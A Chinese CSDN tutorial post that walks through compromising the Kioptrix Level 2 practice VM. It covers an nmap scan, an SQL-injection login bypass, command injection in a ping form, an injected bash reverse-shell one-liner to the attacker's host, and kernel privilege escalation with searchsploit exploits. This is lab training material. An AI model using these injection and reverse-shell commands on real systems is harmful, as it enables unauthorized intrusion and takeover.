黑客零基础第三章-Web漏洞利用实战-命令注入Kioptrix Level 2

最新推荐文章于 2024-02-27 15:01:09 发布
最新推荐文章于 2024-02-27 15:01:09 发布
阅读量2.5k 收藏 1
点赞数 1
分类专栏: 零基础黑客训练
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43879344/article/details/119743122
版权

第三节内容讲述了Web命令注入漏洞和原理,并在DVWA上体验了一把入侵。本节以实战的方式,结合vulnhub靶机Kioptrix Level 2让大家体会命令注入的真实入侵。这个靶机会涉及到一点SQL注入的知识,但易于理解。后续章节会给大家着重讲解SQL注入。

如果靶机部署有疑问,请留言!

1.信息收集

kali IP为192.168.17.4

发现靶机IP 192.168.17.5

 使用第二章nmap命令扫描靶机,

nmap -p `nmap -p- --min-rate=10000 -T4 192.168.17.5 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//` -sC -sV 192.168.17.5

扫描结果如下,

Starting Nmap 7.80 ( https://nmap.org ) at 2021-08-16 10:00 EDT
Nmap scan report for 192.168.17.5                                                                                                                                                                                                          
Host is up (0.0011s latency).                                                                                                                                                                                                              
                                                                                                                                                                                                                                           
PORT     STATE SERVICE    VERSION                                                                                                                                                                                                          
22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)                                                                                                                                                                                    
| ssh-hostkey:                                                                                                                                                                                                                             
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)                                                                                                                                                                            
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)                                                                                                                                                                             
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)                                                                                                                                                                             
|_sshv1: Server supports SSHv1                                                                                                                                                                                                             
80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))                                                                                                                                                                                   
|_http-server-header: Apache/2.0.52 (CentOS)                                                                                                                                                                                               
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).                                                                                                                                                                        
111/tcp  open  rpcbind    2 (RPC #100000)                                                                                                                                                                                                  
443/tcp  open  ssl/https?                                                                                                                                                                                                                  
|_ssl-date: 2021-08-16T18:01:50+00:00; +3h59m59s from scanner time.                                                                                                                                                                        
| sslv2:                                                                                                                                                                                                                                   
|   SSLv2 supported                                                                                                                                                                                                                        
|   ciphers:                                                                                                                                                                                                                               
|     SSL2_DES_192_EDE3_CBC_WITH_MD5                                                                                                                                                                                                       
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5                                                                                                                                                                                                   
|     SSL2_RC2_128_CBC_WITH_MD5                                                                                                                                                                                                            
|     SSL2_RC4_128_WITH_MD5                                                                                                                                                                                                                
|     SSL2_RC4_128_EXPORT40_WITH_MD5                                                                                                                                                                                                       
|     SSL2_RC4_64_WITH_MD5                                                                                                                                                                                                                 
|_    SSL2_DES_64_CBC_WITH_MD5
616/tcp  open  status     1 (RPC #100024)
631/tcp  open  ipp        CUPS 1.1
| http-methods: 
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql      MySQL (unauthorized)
MAC Address: 08:00:27:FA:1F:9D (Oracle VirtualBox virtual NIC)

Host script results:
|_clock-skew: 3h59m58s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 118.98 seconds

打开网页,是一个登陆框,

 使用sql注入的万能密码尝试登陆, 

登陆成功,是一个网络探测功能的页面,

 使用以下命令,尝试命令注入,

192.168.17.4; id

存在命令执行漏洞。

2.获取低权限shell

第一章里选择一个反向连接,

bash -i >& /dev/tcp/192.168.17.4/4444 0>&1

kali监听4444端口,在漏洞界面输入

192.168.17.4;bash -i >& /dev/tcp/192.168.17.4/4444 0>&1

 

成功获取了一个低权限shell。

 3.权限提升

从本章开始,靶机引入提权的方法。后续会有一个章节对提权进行总结。

进入系统后先查看系统版本,uname -a

内核版本为2.6.9。部署靶机时我们指导系统为centos。本地使用searchsploit进行漏洞搜索,

9542貌似可用,拷贝到当前目录searchsploit -m。

 开启一个http服务用于传输文件到靶机。靶机切换到/tmp目录wget下载PoC,

gcc进行编译执行,

 失败!!!!!!!!!!!!!!!!

尝试9545

 下载到靶机

 

编译执行,

 

成功!!!!!!

4.总结

首先通过sql注入万能密码进入系统,里面是一个带有命令注入漏洞的界面,利用可获得低权限shell。提权是内核提权。

本节靶机练习,让我们了解了sql注入的渗透用法,熟悉了名利注入漏洞的利用,了解了靶机与攻击主机的文件传递,体验内核提权。

 

 

 

 

第七感小宇宙
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kali Linux渗透测试之服务扫描(一)——Banner、服务识别、操作系统识别
橘子女侠
04-16 3448
服务扫描: 不能简单的通过端口号来识别服务,目标系统开放80端口不一定开放着http服务,要通过对目标系统进行服务扫描,来识别开放的端口后面到底是什么服务,运行什么样的应用; 1. 服务扫描——Banner(简单但不准确) 通过连接服务器的端口,使其返回的banner信息,可能查不到,也可能是管理员伪造的; 通过软件开发商,软件名称,服务类型,版本号(直接发现已知的漏洞和弱点); 对...
Kioptrix_level_2 新手入门攻略
qq_58683895的博客
09-16 171
使用命令注入及漏洞提权攻略靶机,过程较为完整
Kioptrix: Level 2靶机实战 sql注入万能密码到后台 命令执行;getshell 内核漏洞9542 提权
YouthBelief的博客
11-24 1178
Kioptrix: Level 1靶机实战前言0x01 信息收集1.1 探测靶机ip1.2 nmap探测端口0x02 漏洞探测2.1 访问首页 80端口2.1.1远程系统管理员登录界面2.1.1.1 尝试万能密码2.1.1.2 sqlmap2.1.2 命令执行漏洞利用0x03提权3.1查看当前权限3.2内核漏洞提权3.2.1 查看操作系统版本和内核版本3.2.2 找版本漏洞3.2.3上传到靶机中3.2.4 编译运行0x04 总结 前言 Kioptrix: Level 2 (#1): 靶机地址 https:
Kioptrix Level 2入门级详细教程&小白也能看懂!
最新发布
jockerboss的博客
02-27 862
Kioptrix Level 2入门级教程&小白也能看懂!简单易懂
vulnhub之Kioptrix Level 2
li1136594919的博客
06-09 374
靶机的默认网络方式为桥接,而且改为NAT模式后会自动更改,grud模式也进不去,来来回回折腾了两个小时,都还没搞定IP分配的问题,一度想要删掉靶机。
kioptrix-level2 渗透测试
viki101的博客
09-20 127
3306 (3306/tcp open mysql MySQL (unauthorized))端口,可以利用。开启了80(80/tcp open http Apache httpd 2.0.52 ((CentOS))),一个登录框,看见登录框,就想到了弱口令和sql注入,首先用sql注入万能密码来一波。首先它是一个web控制台,可以ping计算机网络,这就想到了远程命令执行漏洞。根据nmap扫描结果显示,可以发现CentOS,其权限为apache,之后尝试反弹shell。
WEB安全-注入漏洞
10-11
WEB安全-注入漏洞,很好的学习PPT SQL注入是一种Web应用代码中的漏洞。 黑客可以构造特殊请求,使Web应用执行带有附加条件的SQL语句 用户请求中带有参数的值,没有进行任何过滤 用户请求中带有参数的值,没有进行...
WEB漏洞扫描器-AWVS 2020年4月最新版acunetix_14.7.220401065
04-18
量身定制的Web安全设备往往不够测试出一些还未发现的漏洞,因此容易成为黑客攻击目标。 Acunetix -在全世界范围内领先的网络应用安全设备 Acunetix开创了网络应用安全扫描技术:它的工程师们潜心研究网络安全。早...
Linux基础实战命令操作2.0,黑牛程序员
03-03
此文件涵盖了作者毕生经历所编撰而成的黑牛程序教学视频,大佬程序员亲自手把手零基础编程教学,不花一份钱,白嫖编程教学资源,编程小白必学教程,黑客大佬的私密学习的编程心得笔记,零基础学编程,从入门到元老,...
OpenHackathon-Web:基于WebCell v2的开放式Hackathon平台的渐进式Web App
04-05
打开黑客马拉松-Web App 基于的的渐进式Web App 关键链接 UI设计 技术栈 语言: 组件引擎: 组件套件: 状态管理: PWA框架: 打包工具: CI / CD:GitHub和 发展 cd ~ /Desktop git clone ...
VulnHub——Kioptrix Level 2
江左盟的博客
04-21 1139
简介 信息收集 使用fping -agq 192.168.0.0/24探测局域网内其它主机,发现目标主机IP地址,如图: 然后使用nmap --min-rate 10000 -T5 -A -sC -p1-65535 192.168.0.129快速扫描目标主机开启的端口与服务,发现开启22,80,111,443,631,660和3306端口, 使用SearchSploit搜...
Kioptrix Level 2 靶机wp
m0_52496313的博客
08-12 796
Kioptrix Level 2靶机wp
【Oscp备考-Kioptrix2】
weixin_44126257的博客
09-16 1900
Oscp备考:Kioptrix Level 2
Kioptrix Level2
底层社会中的弱智
04-16 870
目标IP:192.168.11.176 端口开放情况: 先从80端口入手 使用抓包--爆破 暂不使用 测试注入 目录扫描 使用post传值,我们抓包后放到sqlmap中测试 添加*号优先测试 sqlmap -r q.txt --level 5 --risk 3 逐步跑出用户名和密码 sqlmap -r q.txt --level 5 --risk 3 -...
KIOPTRIX: LEVEL 2通关详解
arcuied
04-02 191
KIOPTRIX: LEVEL 2通关详解
nmap 基础操作
weixin_41204736的博客
03-13 7077
nmap 主要功能: 主机探测 端口扫描 版本检测 系统检测 支持探测脚本的编写 nmap 实际应用场合 通过对设备或或者防火墙的探测来审计它的安全性 探测目标主机所开放的端口 通过识别新的服务器审计网络的安全性   探测网络上的主机   使用 ping scan 只进行主机发现,不进行端口扫描 #nmap -sn <target> 例1、 (ics) p...
靶机渗透练习60-digitalworld.local:FALL
hirak0的博客
04-20 1877
靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-fall,726/ Description To celebrate the fifth year that the author has survived his infosec career, a new box has been born! This machine resembles a few different machines in the PEN-200 environm
openssl漏洞检查修复
thinker
09-14 2799
TLS, SSH, IPSec协商及其他产品中使用的IDEA、DES及Triple DES密码或者3DES及Triple 3DES存在大约四十亿块的生日界,这可使远程攻击者通过Sweet32攻击,获取纯文本数据。链接:https://www.openssl.org/news/secadv/20160922.txt。链接:https://www.openssl.org/news/secadv/20160922.txt。重点:避免使用IDEA、DES和3DES算法。主要是修改conf文件。
Kioptrix Level2靶机
wanjia01的博客
12-13 432
Kioptrix Level2靶机 WP
sql注入漏洞挖掘实战
08-31
SQL注入漏洞挖掘实战是指通过利用SQL注入漏洞的漏洞挖掘活动。SQL注入漏洞是一种常见的数据库攻击手段,用于利用应用程序对用户输入的SQL语句进行不当处理,从而导致恶意用户可以执行未经授权的数据库操作。这些操作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值